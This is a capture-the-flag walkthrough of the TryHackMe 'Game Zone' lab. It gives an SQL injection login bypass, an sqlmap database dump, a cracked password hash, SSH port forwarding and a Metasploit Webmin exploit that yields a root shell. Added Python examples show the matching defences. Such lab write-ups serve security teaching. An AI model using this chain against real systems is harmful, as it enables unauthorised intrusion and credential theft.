[Tut] TryHackMe – Game Zone Walkthrough


<div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-game-zone-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/gamezone" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/gamezone</a></li>
<li><strong>Difficulty</strong>: Easy</li>
<li><strong>Target</strong>: user and root flags on a Linux server</li>
<li><strong>Highlights</strong>: leveraging port forwarding to expose a webservice from behind a firewall, using <code>sqlmap</code> to find a username and hashed password</li>
<li><strong>Tools used</strong>: <code>sqlmap</code>, <code>nmap</code>, <code>dirb</code>, <code>burpsuite</code>, <code>hydra</code>, <code>john the ripper</code>, <code>metasploit</code></li>
<li><strong>Tags</strong>: <em>sqli, hashcracking, metasploit, ssh tunnel</em></li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="372" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png" alt="" class="wp-image-1071175" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png 1024w, https://blog.finxter.com/wp-content/uplo...00x109.png 300w, https://blog.finxter.com/wp-content/uplo...68x279.png 768w, https://blog.finxter.com/wp-content/uplo...ge-206.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png" alt="" class="wp-image-1071207" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-215.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!</p>
<h2>IPs</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.163.79
export myIP=10.6.2.23</pre>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png" alt="" class="wp-image-1071212" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-216.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Let’s kick things off with our standard <code>nmap</code> and <code>dirb</code> scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.</p>
<p>To find the character’s name on the main page, we can do a reverse image search on Google. I’ve played this title before but forgot his name, so I just googled “<em>hitman game character name</em>” to find the answer to our first question (Agent 47).</p>
<h2>NMAP SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="653" height="535" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png" alt="" class="wp-image-1071177" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png 653w, https://blog.finxter.com/wp-content/uplo...00x246.png 300w" sizes="(max-width: 653px) 100vw, 653px" /></figure>
</div>
<h2>DIRB SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="654" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png" alt="" class="wp-image-1071178" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png 479w, https://blog.finxter.com/wp-content/uplo...20x300.png 220w" sizes="(max-width: 479px) 100vw, 479px" /></figure>
</div>
<h2>WALK THE WEBSITE</h2>
<p>We see a login portal on the landing page of our target IP. We also look at the <code>/images</code> folder that <code>dirb</code> found, but nothing remarkable is there at first glance.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="489" height="543" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png" alt="" class="wp-image-1071179" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png 489w, https://blog.finxter.com/wp-content/uplo...70x300.png 270w" sizes="(max-width: 489px) 100vw, 489px" /></figure>
</div>
<p>Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">' or 1=1 -- -</pre>
<p>The login trick works, and we are presented with a search box.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="484" height="156" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png" alt="" class="wp-image-1071180" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png 484w, https://blog.finxter.com/wp-content/uplo...300x97.png 300w" sizes="(max-width: 484px) 100vw, 484px" /></figure>
</div>
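<p>A bypass like this works when the login query is built by pasting form input straight into the SQL text. The following is an added example, not the site's actual code: it reproduces that pattern against an in-memory SQLite table (the table, column names and stored value are assumptions) and puts the parameterized form beside it.</p>

```python
import sqlite3

def make_db():
    """Constructed sample data; schema and stored value are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    db.execute("INSERT INTO users VALUES ('agent47', 'constructed-hash-value')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: user input becomes part of the SQL statement."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pwd = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def demo():
    db = make_db()
    bypass = "' or 1=1 -- -"  # the username string shown in the walkthrough
    return {
        # The quote closes the literal, "or 1=1" matches every row and
        # "--" comments out the password check.
        "concatenated_bypass": login_concatenated(db, bypass, ""),
        # Bound as a value, the same string is just a username nobody has.
        "parameterized_bypass": login_parameterized(db, bypass, ""),
        "parameterized_valid": login_parameterized(
            db, "agent47", "constructed-hash-value"),
    }

if __name__ == "__main__":
    for name, logged_in in demo().items():
        print(f"{name}: {logged_in}")
```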
<h2>INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png" alt="" class="wp-image-1071217" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png 469w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure>
</div>
<p>Let’s fire up <code>burpsuite</code> now to intercept an HTTP-post request made with this search box.</p>
<p>Intercepted HTTP-post request:</p>
<pre class="wp-block-preformatted"><code>POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close

searchitem=hitman</code>
</pre>
<p>We’ll save this request in a file titled <code>req</code>. </p>
<p>If you use <code>burpsuite</code> to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap</code> command. </p>
<h2>USING SQLMAP TO EXTRACT THE FULL DATABASE </h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png" alt="" class="wp-image-1071214" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-217.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>With the following command, we can instruct <code>sqlmap</code> to attempt to download (dump) the entire database, then look through the output for a login username and hashed password.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sqlmap -r req --dbms=mysql --dump --level 5</pre>
<p>It worked! We see that the database stores a list of game titles and reviews. </p>
<p>The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="948" height="427" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png" alt="" class="wp-image-1071185" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png 948w, https://blog.finxter.com/wp-content/uplo...00x135.png 300w, https://blog.finxter.com/wp-content/uplo...68x346.png 768w" sizes="(max-width: 948px) 100vw, 948px" /></figure>
</div>
<p>We can see that it is probably a SHA256 hash. Now it’s time to …</p>
<h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png" alt="" class="wp-image-1071220" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-219.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256</pre>
<p><code>rockyou.txt</code> is a legendary leaked database of passwords (14,344,391 passwords!)</p>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed</code>
</pre>
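<p>The hash fell in under a second because it is a single unsalted SHA256 pass, which a wordlist run can test millions of times per second. The following added example (not part of the original write-up) shows an audit check for that storage pattern next to a salted, iterated replacement; PBKDF2 is used only because it ships in the Python standard library, and the record format, iteration count and sample rows are assumptions.</p>

```python
import hashlib
import hmac
import os
import re

BARE_SHA256 = re.compile(r"[0-9a-f]{64}")
ITERATIONS = 600_000  # assumed work factor; raise it as hardware allows

def unsalted_sha256(password: str) -> str:
    """Scheme seen in the dump: one SHA-256 pass, no salt, no cost factor."""
    return hashlib.sha256(password.encode()).hexdigest()

def audit_credentials(rows):
    """Return usernames whose stored value is a bare 64-hex-character digest."""
    return [user for user, stored in rows
            if BARE_SHA256.fullmatch(stored.lower())]

def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, iterated record in the form scheme$iterations$salt$key."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${key.hex()}"

def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and cost, compare in constant time."""
    try:
        scheme, iterations, salt_hex, key_hex = record.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        key = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                  bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(key, bytes.fromhex(key_hex))
    except ValueError:
        # Malformed or legacy record (for example a bare digest).
        return False

if __name__ == "__main__":
    # Constructed rows: two users sharing one password under each scheme.
    weak = [("user_a", unsalted_sha256("constructed-pass")),
            ("user_b", unsalted_sha256("constructed-pass"))]
    strong = [("user_a", hash_password("constructed-pass")),
              ("user_b", hash_password("constructed-pass"))]
    print("unsalted digests identical:", weak[0][1] == weak[1][1])
    print("salted records identical:", strong[0][1] == strong[1][1])
    print("flagged by audit:", audit_credentials(weak))
    print("verifies:", verify_password("constructed-pass", strong[0][1]))
```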
<h2>SSH INTO THE BOX AND GRAB THE USER FLAG</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh agent47@$targetIP</pre>
<p>We are in!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ cat user.txt
64—---digits omitted—--------5c
</pre>
<h2>PRIVILEGE ESCALATION</h2>
<p>This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener. </p>
<p>Let’s check for hidden services running on ports that may be behind a firewall. We can use the <code>ss</code> utility to list the listening TCP and UDP sockets on our target machine, with numeric ports and owning processes.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ ss -t -u -l -p -n</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*</code></pre>
<p>This first line is curious. It appears that a service is running on port 10000 of the target system. </p>
<p>Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.</p>
<h2>SET UP PORT FORWARD WITH SSH</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png" alt="" class="wp-image-1071221" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png 469w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure>
</div>
<p>The following command will activate port forwarding via ssh:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -L 10000:localhost:10000 agent47@$targetIP
password: —-cracked-password—-
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$
</pre>
<p>We are connected now with port forwarding in place. Let’s navigate in our browser to <code>http://$targetIP:10000</code></p>
<p>After logging in with the same <code>username:password</code> combination we used with <code>ssh</code>, we are given access to a Webmin portal.</p>
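<p>A defender can run the same <code>ss</code> listing to inventory services that only the firewall hides, since any account with an SSH login can reach them from the host itself or through a forward. The sketch below is an added example, not part of the original write-up; every sample row except the <code>udp *:10000</code> line, and the set of published ports, is constructed.</p>

```python
# Constructed sample in the shape of `ss -t -u -l -p -n` output; only the
# udp *:10000 row comes from the walkthrough, the other rows are assumptions.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      *:10000            *:*
tcp   LISTEN 0      128    *:10000            *:*
tcp   LISTEN 0      80     127.0.0.1:3306     *:*
tcp   LISTEN 0      128    *:22               *:*
tcp   LISTEN 0      128    :::80              :::*
"""

def parse_listeners(ss_output):
    """Yield (proto, bind_address, port) for each socket row in ss output."""
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] == "Netid":
            continue  # header, blank or truncated line
        # rpartition keeps IPv6 forms such as ":::80" intact: ("::", 80).
        address, _, port = fields[4].rpartition(":")
        if port.isdigit():
            yield fields[0], address, int(port)

def internal_only_listeners(ss_output, published_ports):
    """Listeners whose port is not meant to be reachable from the network.

    The packet filter hides these from outside, but they stay reachable
    from the host, so each one needs its own authentication and patching
    regardless of whether it binds to a wildcard or a loopback address.
    """
    return [
        (proto, address, port)
        for proto, address, port in parse_listeners(ss_output)
        if port not in published_ports
    ]

if __name__ == "__main__":
    # Assumption: only SSH and HTTP are intentionally exposed.
    for proto, address, port in internal_only_listeners(SAMPLE_SS_OUTPUT, {22, 80}):
        print(f"{proto} {address}:{port} is hidden by the firewall only")
```

<p>Where unprivileged accounts have no need for tunnels, setting <code>AllowTcpForwarding no</code> for them in <code>sshd_config</code> removes the forwarding path, although a shell user can still reach the listener locally.</p>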
<h2>PRIVESC WITH METASPLOIT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png" alt="" class="wp-image-1071223" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x511.png 768w, https://blog.finxter.com/wp-content/uplo...ge-221.png 1056w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Searching for <code>webmin</code> in Metasploit brings up the following Metasploit module.</p>
<p>Let’s use it and set it up with the following options:</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="863" height="608" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png" alt="" class="wp-image-1071190" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png 863w, https://blog.finxter.com/wp-content/uplo...00x211.png 300w, https://blog.finxter.com/wp-content/uplo...68x541.png 768w" sizes="(max-width: 863px) 100vw, 863px" /></figure>
</div>
<p>Let it rip!&nbsp;</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">run</pre>
<p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sessions -i 0</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="383" height="349" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png" alt="" class="wp-image-1071191" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png 383w, https://blog.finxter.com/wp-content/uplo...00x273.png 300w" sizes="(max-width: 383px) 100vw, 383px" /></figure>
</div>
<p>And we now have our root flag! Thanks for reading this write-up.</p>
</div>


https://www.sickgaming.net/blog/2023/01/...lkthrough/